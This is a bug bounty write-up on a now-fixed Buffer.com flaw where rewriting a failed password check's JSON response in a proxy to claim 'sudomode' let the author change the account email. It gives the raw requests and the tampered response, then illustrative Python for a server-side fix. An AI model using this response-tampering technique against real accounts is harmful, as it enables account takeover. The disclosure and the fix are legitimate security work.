Buffer Authentication Bypass

Hi everyone, here is one of my findings on Buffer.com, where I managed to bypass the authentication.

So basically the authentication workflow is as below:

  • To change the account email, the user needs to provide the current account password
  • If the password is correct, the application lets you change the account email

So let's start.

When a user wants to change their account email, the app asks for the current password like below.

So here I wanted to compare the responses for a correct and an incorrect password.

So here is the request:

POST /account/set-sudomode HTTP/1.1
Date: *****
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8&password=wrongpassword

So the response for a wrong password is below:

HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}

So here is the response for a correct password:

HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}

If you observe both responses, the only difference is that the notice_message and sudomode fields are added in the correct-password response.
So here I used a wrong password, let's say 123456.

The request is like below:

POST /account/set-sudomode HTTP/1.1
Date: *****
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456

Note the csrf_token value in the request, which is:
uyr37832rhehr8he7372829hefdgdf

Response:

HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}

Modify the response (in the intercepting proxy) to:

HTTP/1.1 200 OK
Date: Mon, ****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}

Boom, now it shows as successfully authenticated and you can change your email.
So here is the video proof of concept.
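The root cause here is that the browser was trusted to decide whether sudo mode had been granted: rewriting `"sudomode":"true"` into the response was enough. The fix is for the server to keep the sudo-mode grant in its own session state and re-check it on the email-change request. The following is an added illustration of that server-side design, written for this post; it is not Buffer's code, and the handler names, session layout and 300-second TTL are assumptions.

```python
import hmac, hashlib, os, time

SUDO_TTL = 300  # assumed lifetime of an elevated (sudo-mode) grant, in seconds

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class Account:
    def __init__(self, email: str, password: str):
        self.email = email
        self.salt = os.urandom(16)
        self.pw_hash = hash_password(password, self.salt)

def set_sudomode(session: dict, account: Account, password: str, now=None) -> dict:
    """Modelled handler for POST /account/set-sudomode (hypothetical, not Buffer's code).
    The grant is written only into the server-side session, never derived from
    anything the browser sends back, so the JSON body is purely informational."""
    now = time.time() if now is None else now
    candidate = hash_password(password, account.salt)
    if not hmac.compare_digest(candidate, account.pw_hash):  # constant-time compare
        session.pop("sudomode_until", None)                  # a failed attempt revokes any grant
        return {"error_message": "That's not your current password"}
    session["sudomode_until"] = now + SUDO_TTL
    return {"notice_message": "Great, we believe it's really you", "sudomode": "true"}

def change_email(session: dict, account: Account, new_email: str, now=None) -> dict:
    """Modelled handler for the email change. It consults the server session,
    so a tampered 'sudomode: true' response shown to the browser changes nothing."""
    now = time.time() if now is None else now
    if now >= session.get("sudomode_until", 0):
        return {"error_message": "Please confirm your password first"}
    account.email = new_email
    return {"notice_message": "Email updated"}

def demo() -> bool:
    acct = Account("victim@example.com", "correct horse")  # constructed sample account
    session = {}                                           # server-side session store
    resp = set_sudomode(session, acct, "123456")           # wrong password, as in the write-up
    tampered = dict(resp, sudomode="true")                 # what a proxy could show the browser
    blocked = change_email(session, acct, "attacker@example.com")
    set_sudomode(session, acct, "correct horse")           # only a real password grants sudo mode
    change_email(session, acct, "new@example.com")
    return tampered["sudomode"] == "true" and "error_message" in blocked \
        and acct.email == "new@example.com"
```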

Status: Fixed
Bounty Rewarded

Support Dipak kumar Das by becoming a sponsor. Any amount is appreciated!